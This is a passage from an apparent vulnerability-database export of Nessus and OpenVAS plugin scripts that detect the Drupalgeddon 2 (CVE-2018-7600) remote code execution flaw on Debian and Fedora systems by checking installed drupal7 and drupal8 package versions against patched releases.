value:\n\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result\nin the site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-002\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:20:35", "bulletinFamily": "scanner", "description": "-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/12/03\");\n\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2018-7600\");\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:20:40", "bulletinFamily": "scanner", "description": "-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "published": "2018-04-24T00:00:00", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/12/03\");\n\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2018-7600\");\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/SA-CORE-2018-001\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-07-04T18:55:32", "bulletinFamily": "scanner", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "modified": "2019-07-04T00:00:00", "published": "2018-03-29T00:00:00", "id": "OPENVAS:1361412562310704156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704156", "title": "Debian Security Advisory DSA 4156-1 (drupal7 - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4156-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704156\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian Security Advisory DSA 4156-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4156.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:28", "bulletinFamily": "scanner", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.", "modified": "2019-03-18T00:00:00", "published": "2018-03-29T00:00:00", "id": "OPENVAS:1361412562310891325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891325", "title": "Debian LTS Advisory ([SECURITY] [DLA 1325-1] drupal7 security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1325.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1325-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891325\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1325-1] drupal7 security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\");\n script_tag(name:\"summary\", value:\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u18\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "modified": "2018-10-22T00:00:00", "published": "2018-03-29T00:00:00", "id": "OPENVAS:1361412562310812583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812583", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812583\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 09:55:26 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n 